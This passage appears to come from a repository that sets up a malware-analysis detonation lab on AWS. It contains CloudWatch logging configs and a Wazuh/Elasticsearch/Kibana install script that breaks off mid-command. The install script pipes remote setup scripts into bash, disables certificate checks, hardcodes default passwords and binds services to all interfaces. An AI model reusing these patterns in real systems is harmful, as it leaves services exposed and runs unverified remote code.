| "INFORMATION", 36 | "WARNING", 37 | "ERROR", 38 | "CRITICAL" 39 | ], 40 | "event_name": "System", 41 | "log_group_name": "detonationLab-windows" 42 | }, 43 | { 44 | "event_format": "xml", 45 | "event_levels": [ 46 | "VERBOSE", 47 | "INFORMATION", 48 | "WARNING", 49 | "ERROR", 50 | "CRITICAL" 51 | ], 52 | "event_name": "Security", 53 | "log_group_name": "detonationLab-windows" 54 | }, 55 | { 56 | "event_format": "xml", 57 | "event_levels": [ 58 | "VERBOSE", 59 | "INFORMATION", 60 | "WARNING", 61 | "ERROR", 62 | "CRITICAL" 63 | ], 64 | "event_name": "Application", 65 | "log_group_name": "detonationLab-windows" 66 | } 67 | ] 68 | } 69 | } 70 | }, 71 | "metrics": { 72 | "append_dimensions": { 73 | "AutoScalingGroupName": "${aws:AutoScalingGroupName}", 74 | "ImageId": "${aws:ImageId}", 75 | "InstanceId": "${aws:InstanceId}", 76 | "InstanceType": "${aws:InstanceType}" 77 | }, 78 | "metrics_collected": { 79 | "TCPv4": { 80 | "measurement": [ 81 | "Connections Established" 82 | ], 83 | "metrics_collection_interval": 60 84 | }, 85 | "TCPv6": { 86 | "measurement": [ 87 | "Connections Established" 88 | ], 89 | "metrics_collection_interval": 60 90 | } 91 | } 92 | } 93 | }' 94 | $config | ConvertTo-Json -depth 100 | Out-File "C:\Users\Administrator\Documents\cloudwatchconfig.json" 95 | 96 | #On a server running Windows Server, type the following if you saved the configuration file on the local computer 97 | amazon-cloudwatch-agent-ctl.ps1 -a fetch-config -m ec2 -c file:"C:\Users\Administrator\Documents\cloudwatchconfig.json" -s -------------------------------------------------------------------------------- /additionalInstallationScripts/cloudwatchAgentLogs.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #this script will install the cloudwatch agent, create a cloudwatch log group for the agent to write to and start the logging 3 | 4 | #create cloudwatch log group, IAM role, and IAM policy 5 | #this is done in the cloudformation template 6 | 7 | #Update your Amazon Linux instance to pick up the latest changes in the package repositories. 8 | sudo yum update -y -q -e 0 9 | 10 | #Install the awslogs package. This is the recommended method for installing awslogs on Amazon Linux instances. 11 | sudo yum install awslogs -y -q -e 0 12 | 13 | #Start the awslogs service. 14 | sudo systemctl start awslogsd 15 | 16 | #Run the following command to start the awslogs service at each system boot. 17 | sudo systemctl enable awslogsd.service 18 | 19 | #configure logging agent 20 | cat > /etc/awslogs/awslogs.conf << EOF 21 | # 22 | # ------------------------------------------ 23 | # CLOUDWATCH LOGS AGENT CONFIGURATION FILE 24 | # ------------------------------------------ 25 | # 26 | # --- DESCRIPTION --- 27 | # 28 | # NOTE: A running agent must be stopped and restarted for configuration changes to take effect. 29 | # 30 | # --- CLOUDWATCH LOGS DOCUMENTATION --- 31 | # https://aws.amazon.com/documentation/cloudwatch/ 32 | # 33 | # --- CLOUDWATCH LOGS CONSOLE --- 34 | # --- AGENT COMMANDS --- 35 | # To check or change the running status of the CloudWatch Logs Agent, use the following: 36 | # 37 | # To check running status: service awslogs status 38 | # To stop the agent: service awslogs stop 39 | # To start the agent: service awslogs start 40 | # To start the agent on server startup: chkconfig awslogs on 41 | # 42 | # --- AGENT LOG OUTPUT --- 43 | # You can find logs for the agent in /var/log/awslogs.log 44 | # 45 | 46 | # ------------------------------------------ 47 | # CONFIGURATION DETAILS 48 | # ------------------------------------------ 49 | 50 | [general] 51 | # Path to the CloudWatch Logs agent's state file. The agent uses this file to maintain 52 | # client side state across its executions. 53 | state_file = /var/lib/awslogs/agent-state 54 | 55 | ## Each log file is defined in its own section. The section name doesn't 56 | ## matter as long as its unique within this file. 57 | #[kern.log] 58 | # 59 | ## Path of log file for the agent to monitor and upload. 60 | #file = /var/log/kern.log 61 | # 62 | ## Name of the destination log group. 63 | #log_group_name = kern.log 64 | #log_stream_name = {instance_id} # Defaults to ec2 instance id 65 | # 66 | ## Format specifier for timestamp parsing. Here are some sample formats: 67 | ## Use '%b %d %H:%M:%S' for syslog (Apr 24 08:38:42) 68 | ## Use '%d/%b/%Y:%H:%M:%S' for apache log (10/Oct/2000:13:55:36) 69 | ## Use '%Y-%m-%d %H:%M:%S' for rails log (2008-09-08 11:52:54) 70 | #datetime_format = %b %d %H:%M:%S # Specification details in the table below. 71 | # 72 | ## A batch is buffered for buffer-duration amount of time or 32KB of log events. 73 | ## Defaults to 5000 ms and its minimum value is 5000 ms. 74 | #buffer_duration = 5000 75 | # 76 | # Use 'end_of_file' to start reading from the end of the file. 77 | # Use 'start_of_file' to start reading from the beginning of the file. 78 | #initial_position = start_of_file 79 | # 80 | ## Encoding of file 81 | #encoding = utf-8 # Other supported encodings include: ascii, latin-1 82 | # 83 | # 84 | # 85 | # Following table documents the detailed datetime format specification: 86 | # ---------------------------------------------------------------------------------------------------------------------- 87 | # Directive Meaning Example 88 | # ---------------------------------------------------------------------------------------------------------------------- 89 | # %a Weekday as locale's abbreviated name. Sun, Mon, ..., Sat (en_US) 90 | # ---------------------------------------------------------------------------------------------------------------------- 91 | # %A Weekday as locale's full name. Sunday, Monday, ..., Saturday (en_US) 92 | # ---------------------------------------------------------------------------------------------------------------------- 93 | # %w Weekday as a decimal number, where 0 is Sunday and 6 is Saturday. 0, 1, ..., 6 94 | # ---------------------------------------------------------------------------------------------------------------------- 95 | # %d Day of the month as a zero-padded decimal numbers. 01, 02, ..., 31 96 | # ---------------------------------------------------------------------------------------------------------------------- 97 | # %b Month as locale's abbreviated name. Jan, Feb, ..., Dec (en_US) 98 | # ---------------------------------------------------------------------------------------------------------------------- 99 | # %B Month as locale's full name. January, February, ..., December (en_US) 100 | # ---------------------------------------------------------------------------------------------------------------------- 101 | # %m Month as a zero-padded decimal number. 01, 02, ..., 12 102 | # ---------------------------------------------------------------------------------------------------------------------- 103 | # %y Year without century as a zero-padded decimal number. 00, 01, ..., 99 104 | # ---------------------------------------------------------------------------------------------------------------------- 105 | # %Y Year with century as a decimal number. 1970, 1988, 2001, 2013 106 | # ---------------------------------------------------------------------------------------------------------------------- 107 | # %H Hour (24-hour clock) as a zero-padded decimal number. 00, 01, ..., 23 108 | # ---------------------------------------------------------------------------------------------------------------------- 109 | # %I Hour (12-hour clock) as a zero-padded decimal numbers. 01, 02, ..., 12 110 | # ---------------------------------------------------------------------------------------------------------------------- 111 | # %p Locale's equivalent of either AM or PM. AM, PM (en_US) 112 | # ---------------------------------------------------------------------------------------------------------------------- 113 | # %M Minute as a zero-padded decimal number. 00, 01, ..., 59 114 | # ---------------------------------------------------------------------------------------------------------------------- 115 | # %S Second as a zero-padded decimal numbers. 00, 01, ..., 59 116 | # ---------------------------------------------------------------------------------------------------------------------- 117 | # %f Microsecond as a decimal number, zero-padded on the left. 000000, 000001, ..., 999999 118 | # ---------------------------------------------------------------------------------------------------------------------- 119 | # %z UTC offset in the form +HHMM or -HHMM (empty string if the the object is naive). (empty), +0000, -0400, +1030 120 | # ---------------------------------------------------------------------------------------------------------------------- 121 | # %j Day of the year as a zero-padded decimal number. 001, 002, ..., 365 122 | # ---------------------------------------------------------------------------------------------------------------------- 123 | # %U Week number of the year (Sunday as the first day of the week) as a zero padded 00, 01, ..., 53 124 | # decimal number. All days in a new year preceding the first Sunday are considered 125 | # to be in week 0. 126 | # ---------------------------------------------------------------------------------------------------------------------- 127 | # %W Week number of the year (Monday as the first day of the week) as a decimal number. 00, 01, ..., 53 128 | # All days in a new year preceding the first Monday are considered to be in week 0. 129 | # ---------------------------------------------------------------------------------------------------------------------- 130 | # %c Locale's appropriate date and time representation. Tue Aug 16 21:30:00 1988 (en_US) 131 | # ---------------------------------------------------------------------------------------------------------------------- 132 | 133 | 134 | [/var/log/messages] 135 | datetime_format = %b %d %H:%M:%S 136 | file = /var/log/messages 137 | buffer_duration = 5000 138 | log_stream_name = {instance_id} 139 | initial_position = start_of_file 140 | log_group_name = detonationLab-linux 141 | 142 | [/var/log/auth.log] 143 | datetime_format = %b %d %H:%M:%S 144 | file = /var/log/auth.log 145 | buffer_duration = 5000 146 | log_stream_name = {instance_id} 147 | initial_position = start_of_file 148 | log_group_name = detonationLab-linux 149 | 150 | [/var/log/secure] 151 | datetime_format = %b %d %H:%M:%S 152 | file = /var/log/secure 153 | buffer_duration = 5000 154 | log_stream_name = {instance_id} 155 | initial_position = start_of_file 156 | log_group_name = detonationLab-linux 157 | 158 | [/var/log/boot.log] 159 | datetime_format = %b %d %H:%M:%S 160 | file = /var/log/boot.log 161 | buffer_duration = 5000 162 | log_stream_name = {instance_id} 163 | initial_position = start_of_file 164 | log_group_name = detonationLab-linux 165 | 166 | [/var/log/dmesg] 167 | datetime_format = %b %d %H:%M:%S 168 | file = /var/log/dmesg 169 | buffer_duration = 5000 170 | log_stream_name = {instance_id} 171 | initial_position = start_of_file 172 | log_group_name = detonationLab-linux 173 | 174 | [/var/log/kern.log] 175 | datetime_format = %b %d %H:%M:%S 176 | file = /var/log/kern.log 177 | buffer_duration = 5000 178 | log_stream_name = {instance_id} 179 | initial_position = start_of_file 180 | log_group_name = detonationLab-linux 181 | 182 | [/var/log/faillog] 183 | datetime_format = %b %d %H:%M:%S 184 | file = /var/log/faillog 185 | buffer_duration = 5000 186 | log_stream_name = {instance_id} 187 | initial_position = start_of_file 188 | log_group_name = detonationLab-linux 189 | 190 | [/var/log/cron] 191 | datetime_format = %b %d %H:%M:%S 192 | file = /var/log/cron 193 | buffer_duration = 5000 194 | log_stream_name = {instance_id} 195 | initial_position = start_of_file 196 | log_group_name = detonationLab-linux 197 | 198 | [/var/log/yum.log] 199 | datetime_format = %b %d %H:%M:%S 200 | file = /var/log/yum.log 201 | buffer_duration = 5000 202 | log_stream_name = {instance_id} 203 | initial_position = start_of_file 204 | log_group_name = detonationLab-linux 205 | 206 | [/var/log/maillog] 207 | datetime_format = %b %d %H:%M:%S 208 | file = /var/log/maillog 209 | buffer_duration = 5000 210 | log_stream_name = {instance_id} 211 | initial_position = start_of_file 212 | log_group_name = detonationLab-linux 213 | 214 | [/var/log/mail.log] 215 | datetime_format = %b %d %H:%M:%S 216 | file = /var/log/mail.log 217 | buffer_duration = 5000 218 | log_stream_name = {instance_id} 219 | initial_position = start_of_file 220 | log_group_name = detonationLab-linux 221 | 222 | [/var/log/httpd] 223 | datetime_format = %b %d %H:%M:%S 224 | file = /var/log/httpd 225 | buffer_duration = 5000 226 | log_stream_name = {instance_id} 227 | initial_position = start_of_file 228 | log_group_name = detonationLab-linux 229 | 230 | [/var/log/mysqld.log] 231 | datetime_format = %b %d %H:%M:%S 232 | file = /var/log/mysqld.log 233 | buffer_duration = 5000 234 | log_stream_name = {instance_id} 235 | initial_position = start_of_file 236 | log_group_name = detonationLab-linux 237 | 238 | [/var/log/mysql.log] 239 | datetime_format = %b %d %H:%M:%S 240 | file = /var/log/mysql.log 241 | buffer_duration = 5000 242 | log_stream_name = {instance_id} 243 | initial_position = start_of_file 244 | log_group_name = detonationLab-linux 245 | 246 | [/var/log/btmp] 247 | datetime_format = %b %d %H:%M:%S 248 | file = /var/log/btmp 249 | buffer_duration = 5000 250 | log_stream_name = {instance_id} 251 | initial_position = start_of_file 252 | log_group_name = detonationLab-linux 253 | 254 | [/var/log/auth.log] 255 | datetime_format = %b %d %H:%M:%S 256 | file = /var/log/auth.log 257 | buffer_duration = 5000 258 | log_stream_name = {instance_id} 259 | initial_position = start_of_file 260 | log_group_name = detonationLab-linux 261 | 262 | [/var/log/daemon.log] 263 | datetime_format = %b %d %H:%M:%S 264 | file = /var/log/daemon.log 265 | buffer_duration = 5000 266 | log_stream_name = {instance_id} 267 | initial_position = start_of_file 268 | log_group_name = detonationLab-linux 269 | 270 | [/var/log/lastlog] 271 | datetime_format = %b %d %H:%M:%S 272 | file = /var/log/lastlog 273 | buffer_duration = 5000 274 | log_stream_name = {instance_id} 275 | initial_position = start_of_file 276 | log_group_name = detonationLab-linux 277 | 278 | [/var/log/user.log] 279 | datetime_format = %b %d %H:%M:%S 280 | file = /var/log/user.log 281 | buffer_duration = 5000 282 | log_stream_name = {instance_id} 283 | initial_position = start_of_file 284 | log_group_name = detonationLab-linux 285 | 286 | [/var/log/wtmp] 287 | datetime_format = %b %d %H:%M:%S 288 | file = /var/log/wtmp 289 | buffer_duration = 5000 290 | log_stream_name = {instance_id} 291 | initial_position = start_of_file 292 | log_group_name = detonationLab-linux 293 | 294 | [/var/log/utmp] 295 | datetime_format = %b %d %H:%M:%S 296 | file = /var/log/utmp 297 | buffer_duration = 5000 298 | log_stream_name = {instance_id} 299 | initial_position = start_of_file 300 | log_group_name = detonationLab-linux 301 | 302 | [/var/log/audit] 303 | datetime_format = %b %d %H:%M:%S 304 | file = /var/log/audit 305 | buffer_duration = 5000 306 | log_stream_name = {instance_id} 307 | initial_position = start_of_file 308 | log_group_name = detonationLab-linux 309 | 310 | [/var/log/sssd] 311 | datetime_format = %b %d %H:%M:%S 312 | file = /var/log/sssd 313 | buffer_duration = 5000 314 | log_stream_name = {instance_id} 315 | initial_position = start_of_file 316 | log_group_name = detonationLab-linux 317 | EOF 318 | 319 | 320 | #restart cloudwatch agent 321 | sudo systemctl restart awslogsd -------------------------------------------------------------------------------- /additionalInstallationScripts/installWazuh.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # install wazuh server 3 | # Wazuh documentation - https://documentation.wazuh.com/current/installation-guide/installing-wazuh-server/index.html 4 | ####################################### 5 | 6 | # Versions to install 7 | ELASTIC_VERSION=6.6.1 8 | WAZUH_VERSION=3.8 9 | WAZUH_PATCH=$WAZUH_VERSION.2 10 | WAZUH_PACKAGE=$WAZUH_PATCH-1 11 | WAZUH_MANAGER_PKG="wazuh-manager" 12 | WAZUH_API_PKG="wazuh-api" 13 | ELASTIC_PKG="elasticsearch" 14 | LOGSTASH_PKG="logstash" 15 | KIBANA_PKG="kibana" 16 | 17 | # Configuration variables 18 | PKG_MANAGER="" 19 | PKG_INSTALL="" 20 | PKG_OPTIONS="" 21 | OS_FAMILY="" 22 | REPO_FILE="" 23 | 24 | set_global_parameters() { 25 | if command -v apt-get > /dev/null 2>&1 ; then 26 | PKG_MANAGER="apt-get" 27 | PKG_OPTIONS="-y" 28 | OS_FAMILY="Debian" 29 | REPO_FILE="/etc/apt/sources.list.d/wazuh.list" 30 | ELASTIC_REPO_FILE="/etc/apt/sources.list.d/elastic-6.x.list" 31 | WAZUH_MANAGER_PKG="${WAZUH_MANAGER_PKG}=${WAZUH_PACKAGE}" 32 | WAZUH_API_PKG="${WAZUH_API_PKG}=${WAZUH_PACKAGE}" 33 | ELASTIC_PKG="${ELASTIC_PKG}=${ELASTIC_VERSION}" 34 | LOGSTASH_PKG="${LOGSTASH_PKG}=1:${ELASTIC_VERSION}-1" 35 | KIBANA_PKG="${KIBANA_PKG}=${ELASTIC_VERSION}" 36 | 37 | elif command -v yum > /dev/null 2>&1 ; then 38 | PKG_MANAGER="yum" 39 | PKG_OPTIONS="-y -q -e 0" 40 | OS_FAMILY="RHEL" 41 | REPO_FILE="/etc/yum.repos.d/wazuh.repo" 42 | ELASTIC_REPO_FILE="/etc/yum.repos.d/elastic.repo" 43 | WAZUH_MANAGER_PKG="${WAZUH_MANAGER_PKG}-${WAZUH_PACKAGE}" 44 | WAZUH_API_PKG="${WAZUH_API_PKG}-${WAZUH_PACKAGE}" 45 | ELASTIC_PKG="${ELASTIC_PKG}-${ELASTIC_VERSION}" 46 | LOGSTASH_PKG="${LOGSTASH_PKG}-${ELASTIC_VERSION}" 47 | KIBANA_PKG="${KIBANA_PKG}-${ELASTIC_VERSION}" 48 | elif command -v zypper > /dev/null 2>&1 ; then 49 | PKG_MANAGER="zypper" 50 | PKG_OPTIONS="-y -l" 51 | OS_FAMILY="SUSE" 52 | REPO_FILE="/etc/zypp/repos.d/wazuh.repo" 53 | ELASTIC_REPO_FILE="/etc/zypp/repos.d/elastic.repo" 54 | WAZUH_MANAGER_PKG="${WAZUH_MANAGER_PKG}-${WAZUH_PACKAGE}" 55 | WAZUH_API_PKG="${WAZUH_API_PKG}-${WAZUH_PACKAGE}" 56 | ELASTIC_PKG="${ELASTIC_PKG}-${ELASTIC_VERSION}" 57 | LOGSTASH_PKG="${LOGSTASH_PKG}-${ELASTIC_VERSION}" 58 | KIBANA_PKG="${KIBANA_PKG}-${ELASTIC_VERSION}" 59 | fi 60 | 61 | PKG_INSTALL="${PKG_MANAGER} install" 62 | 63 | return 0 64 | } 65 | 66 | install_dependencies() { 67 | ## RHEL/CentOS/Fedora/Amazon/SUSE based OS 68 | if [ "${OS_FAMILY}" == "RHEL" ] || [ "${OS_FAMILY}" == "SUSE" ]; then 69 | ${PKG_INSTALL} ${PKG_OPTIONS} openssl wget python-pip 70 | ## Debian/Ubuntu based OS 71 | else 72 | ${PKG_MANAGER} update 73 | ${PKG_INSTALL} ${PKG_OPTIONS} curl apt-transport-https lsb-release \ 74 | openssl software-properties-common dirmngr python-pip 75 | fi 76 | pip install boto3 requests 77 | } 78 | 79 | add_nodejs_repository() { 80 | if [ "${OS_FAMILY}" == "RHEL" ]; then 81 | curl --silent --location https://rpm.nodesource.com/setup_8.x | bash - 82 | elif [ "${OS_FAMILY}" == "SUSE" ]; then 83 | ${PKG_MANAGER} addrepo http://download.opensuse.org/distribution/leap/15.0/repo/oss/ node8 84 | ${PKG_MANAGER} --gpg-auto-import-keys refresh 85 | else 86 | curl -sL https://deb.nodesource.com/setup_8.x | bash - 87 | fi 88 | } 89 | 90 | add_wazuh_repository() { 91 | # Add Wazuh Repository 92 | ## RHEL/CentOS/Fedora/Amazon/SUSE based OS 93 | if [ "${OS_FAMILY}" == "RHEL" ] || [ "${OS_FAMILY}" == "SUSE" ]; then 94 | rpm --import https://packages.wazuh.com/key/GPG-KEY-WAZUH 95 | echo -ne "[wazuh_repo]\ngpgcheck=1\ngpgkey=https://packages.wazuh.com/key/GPG-KEY-WAZUH\nenabled=1\nname=Wazuh epository\nbaseurl=https://packages.wazuh.com/3.x/yum/\nprotect=1" > ${REPO_FILE} 96 | 97 | ## Debian/Ubuntu based OS 98 | else 99 | curl -s https://packages.wazuh.com/key/GPG-KEY-WAZUH | apt-key add - 100 | echo "deb https://packages.wazuh.com/3.x/apt/ stable main" | tee -a ${REPO_FILE} 101 | ${PKG_MANAGER} update 102 | fi 103 | } 104 | 105 | install_wazuh() { 106 | # Install the Wazuh Manager and enable integrator module 107 | ${PKG_INSTALL} ${PKG_OPTIONS} ${WAZUH_MANAGER_PKG} 108 | # The auth module only needs to be enabled in 109 | # versions prior to v3.8.0 110 | if [[ ${WAZUH_VERSION} < "3.8" ]]; then 111 | /var/ossec/bin/ossec-control enable auth 112 | fi 113 | /var/ossec/bin/ossec-control enable integrator 114 | 115 | # Restart the Wazuh Manager 116 | ## Check for systemd 117 | if command -v systemctl >/dev/null; then 118 | systemctl restart wazuh-manager > /dev/null 2>&1 119 | ## Check for SysV 120 | elif command -v service >/dev/null; then 121 | service wazuh-manager restart > /dev/null 2>&1 122 | ## Check for upstart 123 | elif command -v update-rc.d >/dev/null; then 124 | ## Check for RHEL based OS 125 | if [ -f /etc/rc.d/init.d/wazuh-manager ]; then 126 | /etc/init.d/wazuh-manager restart > /dev/null 2>&1 127 | ## Check for SUSE 128 | elif [ -f /etc/init.d/wazuh-manager ]; then 129 | /etc/rc.d/init.d/wazuh-manager restart > /dev/null 2>&1 130 | fi 131 | fi 132 | 133 | # Install NodeJS and Wazuh API 134 | ${PKG_INSTALL} ${PKG_OPTIONS} nodejs 135 | ${PKG_INSTALL} ${PKG_OPTIONS} ${WAZUH_API_PKG} 136 | } 137 | 138 | add_aws_config() { 139 | cat >> /var/ossec/etc/ossec.conf <<\EOF 140 | 141 | 142 | no 143 | 10m 144 | yes 145 | yes 146 | 147 | cloudtraillogging 148 | insert_access_key 149 | insert_secret_key 150 | 151 | 152 | guarddutylogging 153 | firehose 154 | insert_access_key 155 | insert_secret_key 156 | 157 | 158 | iamlogging 159 | firehose 160 | insert_access_key 161 | insert_secret_key 162 | 163 | 164 | insert_access_key 165 | insert_secret_key 166 | 167 | 168 | macielogging 169 | firehose 170 | insert_access_key 171 | insert_secret_key 172 | 173 | 174 | vpcflowlogging 175 | insert_access_key 176 | insert_secret_key 177 | 178 | 179 | 180 | EOF 181 | } 182 | 183 | add_custom_rules() { 184 | # This rules will silent the alerts from non malware files 185 | cat >> /var/ossec/etc/rules/local_rules.xml << \EOF 186 | 187 | 188 | 87100 189 | 0 190 | VirusTotal: Alert - No records in VirusTotal database 191 | 192 | 193 | 194 | 87100 195 | 1 196 | 0 197 | VirusTotal: Alert - $(virustotal.source.file) - No positives found 198 | 199 | 200 | EOF 201 | } 202 | 203 | setup_agent_fim() { 204 | # Configure real time monitoring in: 205 | # - home directories under linux agents 206 | # - desktop, documents, downloads, startup programs and userdata under windows agents 207 | cat > /var/ossec/etc/shared/default/agent.conf << \EOF 208 | 209 | 210 | /home 211 | 212 | 213 | 214 | 215 | C:\Users\Administrator\Desktop 216 | C:\Users\Administrator\Downloads 217 | C:\Users\Administrator\Documents 218 | %APPDATA% 219 | 220 | 221 | EOF 222 | } 223 | 224 | setup_wazuh_api() { 225 | cd /var/ossec/api/configuration/auth 226 | node htpasswd -c user wazuh -b wazuh 227 | # Restart the Wazuh Manager 228 | ## Check for systemd 229 | if command -v systemctl >/dev/null; then 230 | systemctl restart wazuh-api > /dev/null 2>&1 231 | ## Check for SysV 232 | elif command -v service >/dev/null; then 233 | service wazuh-api restart > /dev/null 2>&1 234 | ## Check for upstart 235 | elif command -v update-rc.d >/dev/null; then 236 | ## Check for RHEL based OS 237 | if [ -f /etc/rc.d/init.d/wazuh-api ]; then 238 | /etc/init.d/wazuh-api restart > /dev/null 2>&1 239 | ## Check for SUSE 240 | elif [ -f /etc/init.d/wazuh-api ]; then 241 | /etc/rc.d/init.d/wazuh-api restart > /dev/null 2>&1 242 | fi 243 | fi 244 | } 245 | 246 | add_custom_config() { 247 | add_aws_config 248 | add_custom_rules 249 | setup_agent_fim 250 | } 251 | 252 | install_java() { 253 | ## RHEL/CentOS/Fedora based OS 254 | if [ "${OS_FAMILY}" == "RHEL" ] || [ "${OS_FAMILY}" == "SUSE" ]; then 255 | ## install Oracle Java JRE 8 256 | wget --no-check-certificate -c --header "Cookie: oraclelicense=accept-securebackup-cookie" http://javadl.oracle.com/webapps/download/AutoDL?BundleId=235716_2787e4a523244c269598db4e85c51e0c -O jre-8u191-linux-x64.rpm 257 | 258 | ## install the RPM package using yum 259 | ${PKG_INSTALL} ${PKG_OPTIONS} jre-8u191-linux-x64.rpm 260 | else 261 | ${PKG_MANAGER} update 262 | ${PKG_INSTALL} ${PKG_OPTIONS} openjdk-8-jre 263 | fi 264 | } 265 | 266 | add_elastic_repository() { 267 | ## RHEL/CentOS/Fedora based OS 268 | if [ "${OS_FAMILY}" == "RHEL" ] || [ "${OS_FAMILY}" == "SUSE" ]; then 269 | ## Install the Elastic repository and its GPG key 270 | rpm --import https://packages.elastic.co/GPG-KEY-elasticsearch 271 | echo -ne "[elasticsearch-6.x]\nname=Elasticsearch repository for 6.x packages\nbaseurl=https://artifacts.elastic.co/packages/6.x/yum\ngpgcheck=1\ngpgkey=https://artifacts.elastic.co/GPG-KEY-elasticsearch\nenabled=1\nautorefresh=1\ntype=rpm-md" > ${ELASTIC_REPO_FILE} 272 | 273 | ## Debian/Ubuntu based OS 274 | else 275 | curl -s https://artifacts.elastic.co/GPG-KEY-elasticsearch | apt-key add - 276 | echo "deb https://artifacts.elastic.co/packages/6.x/apt stable main" | tee -a ${ELASTIC_REPO_FILE} 277 | ${PKG_MANAGER} update 278 | fi 279 | } 280 | 281 | wait_elastic_component() { 282 | query="$@" 283 | until ${query}; do 284 | >&2 echo "Elastic component is unavailable - sleeping for 5 seconds" 285 | sleep 5 286 | done 287 | >&2 echo "Elastic component is up - executing commands" 288 | } 289 | 290 | install_elastic() { 291 | # Install elasticsearch package and enable its service 292 | ${PKG_INSTALL} ${PKG_OPTIONS} ${ELASTIC_PKG} 293 | # Set up network.host value in elasticsearch configuration file 294 | sed -i 's/#network.host: 192.168.0.1/network.host: 0.0.0.0/' /etc/elasticsearch/elasticsearch.yml 295 | # Enable and start Elasticsearch service 296 | ## Check for systemd 297 | if command -v systemctl >/dev/null; then 298 | systemctl daemon-reload > /dev/null 2>&1 299 | systemctl enable elasticsearch.service > /dev/null 2>&1 300 | systemctl start elasticsearch.service > /dev/null 2>&1 301 | ## Check for SysV 302 | elif command -v service >/dev/null; then 303 | chkconfig --add elasticsearch > /dev/null 2>&1 304 | chkconfig elasticsearch on > /dev/null 2>&1 305 | service elasticsearch start > /dev/null 2>&1 306 | fi 307 | 308 | # Wait until elasticsearch comes up before continuing 309 | ES_URL=${ES_URL:-'http://localhost:9200'} 310 | ES_USER=${ES_USER:-kibana} 311 | ES_PASSWORD=${ES_PASSWORD:-changeme} 312 | ES_QUERY="curl -u ${ES_USER}:${ES_PASSWORD} -XGET ${ES_URL}" 313 | wait_elastic_component ${ES_QUERY} 314 | # Load the Wazuh template for Elasticsearch 315 | curl https://raw.githubusercontent.com/wazuh/wazuh/$WAZUH_VERSION/extensions/elasticsearch/wazuh-elastic6-template-alerts.json | curl -XPUT 'http://localhost:9200/_template/wazuh' -H 'Content-Type: application/json' -d @- 316 | } 317 | 318 | install_logstash() { 319 | ${PKG_INSTALL} ${PKG_OPTIONS} ${LOGSTASH_PKG} 320 | 321 | ## Download the Wazuh configuration file for Logstash 322 | ## Local configuration (only in a single-host architecture) 323 | curl -so /etc/logstash/conf.d/01-wazuh.conf https://raw.githubusercontent.com/wazuh/wazuh/$WAZUH_VERSION/extensions/logstash/01-wazuh-local.conf 324 | 325 | ## Because the Logstash user needs to read the alerts.json file, please add it to OSSEC group by running 326 | usermod -a -G ossec logstash 327 | 328 | # Enable and start Logstash service 329 | ## Check for systemd 330 | if command -v systemctl >/dev/null; then 331 | systemctl daemon-reload > /dev/null 2>&1 332 | systemctl enable logstash.service > /dev/null 2>&1 333 | systemctl start logstash.service > /dev/null 2>&1 334 | ## Check for SysV 335 | elif command -v service >/dev/null; then 336 | ## Follow the next steps if you use CentOS-6/RHEL-6 or Amazon AMI (logstash uses Upstart like a service manager and needs to be fixed, see this bug): 337 | ## Edit the file /etc/logstash/startup.options changing line 30 from LS_GROUP=logstash to LS_GROUP=ossec. 338 | sed -i 's/LS_GROUP=logstash/LS_GROUP=ossec/' /etc/logstash/startup.options 339 | ## Update the service with the new parameters by running the command /usr/share/logstash/bin/system-install 340 | /usr/share/logstash/bin/system-install 341 | ## Force install a SysV init script by running: /usr/share/logstash/bin/system-install /etc/logstash/startup.options sysv as root 342 | /usr/share/logstash/bin/system-install /etc/logstash/startup.options sysv 343 | ## Enable and start Logstash 344 | chkconfig --add logstash > /dev/null 2>&1 345 | chkconfig logstash on > /dev/null 2>&1 346 | service logstash start > /dev/null 2>&1 347 | fi 348 | } 349 | 350 | install_kibana() { 351 | # install Kibana 352 | ${PKG_INSTALL} ${PKG_OPTIONS} ${KIBANA_PKG} 353 | 354 | ## Install the Wazuh App plugin for Kibana 355 | sudo -u kibana NODE_OPTIONS="--max-old-space-size=3072" /usr/share/kibana/bin/kibana-plugin install https://packages.wazuh.com/wazuhapp/wazuhapp-$(echo $WAZUH_PATCH)_$(echo $ELASTIC_VERSION).zip 356 | 357 | ## Kibana will only listen on the loopback interface (localhost) by default. To set up Kibana to listen on all interfaces, edit the file /etc/kibana/kibana.yml uncommenting the setting server.host. Change the value to: 358 | sed -i 's/#server.host: "localhost"/server.host: "0.0.0.0"/' /etc/kibana/kibana.yml 359 | 360 | # Enable and start Kibana service 361 | ## Check for systemd 362 | if command -v systemctl >/dev/null; then 363 | systemctl daemon-reload > /dev/null 2>&1 364 | systemctl enable kibana.service > /dev/null 2>&1 365 | systemctl start kibana.service > /dev/null 2>&1 366 | ## Check for SysV 367 | elif command -v service >/dev/null; then 368 | chkconfig --add kibana > /dev/null 2>&1 369 | chkconfig kibana on > /dev/null 2>&1 370 | service kibana start > /dev/null 2>&1 371 | fi 372 | } 373 | 374 | disable_elastic_repository() { 375 | # Disable the Elasticsearch repository 376 | # It is recommended that the Elasticsearch repository be disabled in order to prevent an upgrade to a newer Elastic Stack version due to the possibility of undoing changes with the App. 377 | 378 | ## RHEL/CentOS/Fedora based OS 379 | if [ "${OS_FAMILY}" == "RHEL" ] || [ "${OS_FAMILY}" == "SUSE" ]; then 380 | sed -i "s/^enabled=1/enabled=0/" ${ELASTIC_REPO_FILE} 381 | else 382 | sed -i "s/^deb/#deb/" ${ELASTIC_REPO_FILE} 383 | ${PKG_MANAGER} update 384 | fi 385 | } 386 | 387 | configure_wazuh_api() { 388 | # Set up Wazuh API parameters 389 | API_PROTOCOL=${API_PROTOCOL:-http} 390 | HOSTNAME=${HOSTNAME:-"$(hostname -f)"} 391 | API_SERVER=${API_SERVER:-"localhost"} 392 | API_URL=${API_PROTOCOL}://${API_SERVER} 393 | API_PORT=${API_PORT:-55000} 394 | API_USER=${API_USER:-wazuh} 395 | API_PASS=${API_PASS:-wazuh} 396 | API_PASS_BASE64=$(echo -n ${API_PASS} | base64) 397 | ES_URL=${ES_URL:-'http://localhost:9200'} 398 | ES_USER=${ES_USER:-kibana} 399 | ES_PASSWORD=${ES_PASSWORD:-changeme} 400 | ES_QUERY="curl -u ${ES_USER}:${ES_PASSWORD} -XGET ${ES_URL}" 401 | # Wait until Elasticsearch is up and running. 402 | wait_elastic_component "${ES_QUERY}" 403 | echo -e "\nSetting Wazuh API credentials into the Wazuh Kibana application" 404 | # The Wazuh Kibana application configuration is the document with the ID 1513629884013, don't change that! 405 | curl -s -u ${ES_USER}:${ES_PASSWORD} -XPOST "${ES_URL}/.wazuh/wazuh-configuration/1513629884013" -H 